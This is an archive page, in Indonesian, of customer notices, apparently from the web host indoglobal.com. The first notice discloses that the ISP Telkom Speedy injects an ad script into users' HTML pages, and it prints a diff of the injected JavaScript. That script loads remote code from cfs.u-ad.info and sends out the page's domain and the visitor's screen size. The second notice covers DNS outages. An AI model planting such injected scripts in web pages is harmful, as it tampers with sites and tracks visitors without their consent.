Arsip

Injected Javascript pada Telkom Speedy

Dear pelanggan indoglobal.com,

Saat ini kami mendapat mendapat laporan bahwa ada yang melakukan penyisipan kode Javascript pada setiap halaman HTML, walaupun kode HTML di server tidak berubah. Kami informasikan bahwa penyisipan tersebut tidak dilakukan oleh indoglobal.com. Besar kemungkinan aksi ini dilakukan oleh Telkom Speedy atau ISP lain yang anda gunakan.

Mulai beberapa hari terakhir ini, Telkom Speedy melakukan penyisipan kode Javascript pada setiap halaman HTML yang didownload oleh pengguna. Berikut adalah perbedaan dalam format diff antara halaman HTML asli dan halaman HTML yang sama jika didownload melalui Telkom Speedy:

--- speedy-orig.html    2014-10-01 16:49:42.079000053 +0700
+++ speedy.html 2014-10-01 16:54:18.444740918 +0700
@@ -934,5 +934,5 @@
 _WidgetManager._RegisterWidget('_NavbarView', new _WidgetInfo('Navbar1', 'navbar', null, document.getElementById('Navbar1'), {}, 'displayModeFull'));
 _WidgetManager._RegisterWidget('_BlogView', new _WidgetInfo('Blog1', 'main', null, document.getElementById('Blog1'), {'cmtInteractionsEnabled': false, 'lightboxEnabled': true, 'lightboxModuleUrl': 'https://www.blogger.com/static/v1/jsbin/2838879091-lbx.js', 'lightboxCssUrl': 'https://www.blogger.com/static/v1/v-css/2392111094-lightbox_bundle.css'}, 'displayModeFull'));
 </script>
-</body>
+<script type="text/javascript">if(self==top){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);document.write("<scr"+"ipt type=text/javascript src="+idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request");document.write("?id=1");document.write("&amp;enc=telkom2");document.write("&amp;params=" + "4TtHaUQnUEiP6K%2fc5C582NgXaqsgjSGNs3lbIXWj8KAI9hZxx17Sb3fuELjDJZUfbvZ3LPn7%2bWvUU6xjnS%2b6MeNqHEzu8L4USEMTnyDMakWORBj49qHxFeircI5pPmryGvF7Zi5O78lNgsFlyAZZFrPkW6x0eLoObosK7H5dgaGD7M0%2fyBNpuRE%2burYg9mLNuNxNpTZmszvbFliQPEu2Cqk39ZStJpWgtnfg4m%2byEA10ghTfOaVdLgR7zNdjDy9QI9U7FsRgQhfd3l3cR34Zq0iuWMXrNTFbYe86KMFH3GQ%3d");document.write("&amp;idc_r="+idc_glo_r);document.write("&amp;domain="+document.domain);document.write("&amp;sw="+screen.width+"&amp;sh="+screen.height);document.write("></scr"+"ipt>");}</script><noscript>activate javascript</noscript></body>
 </html>

Praktik semacam ini juga dilakukan ISP lain seperti Telkomsel atau XL.

Untuk melakukan pengaduan atas masalah ini, kami sarankan untuk menghubungi langsung pihak Telkom Speedy atau ISP lain yang anda gunakan.

Dari sisi pemilik situs web, anda juga bisa mencegah situs anda diinjeksi Javascript oleh ISP dengan cara menggunakan HTTPS.

Update: Kami mendapat informasi bahwa praktik ini sudah dilakukan sejak tahun lalu, namun sebelumnya tidak semua pelanggan mendapat Javascript injection seperti ini.

Masalah DNS Server Telkom Speedy

Bagi pelanggan kami yang juga menjadi pelanggan layanan akses Internet dari Telkom Speedy, barangkali anda mengalami kesulitan untuk mengakses situs web anda?

Masalah tersebut bukan merupakan masalah di sisi kami, melainkan masalah DNS dari layanan Telkom Speedy. Ini terjadi bagi sebagian pelanggan kami. Ada pelanggan kami yang tertimpa musibah ini, ada pula yang tidak. Mengenai penyebabnya, kami juga tidak tahu persis, hanya pihak Telkom Speedy yang tahu. Berdasarkan pengamatan kami, masalah ini bukan hanya menimpa pelanggan kami, tetapi juga situs-situs di luar jaringan kami, termasuk kompetitor-kompetitor kami.

Bagi anda mengalami masalah ini, sebelum menghubungi kami, mohon untuk sebelumnya mengecek dahulu melalui ISP lain, misalnya melalui ponsel anda. Jika situs anda dapat diakses melalui ISP lain atau ponsel anda, maka masalahnya kemungkinan besar terdapat pada DNS layanan Telkom Speedy anda.

Masalah ini di luar kontrol indoglobal.com, silakan anda hubungi Telkom Speedy melalui nomor telepon 147 untuk melaporkan masalah ini.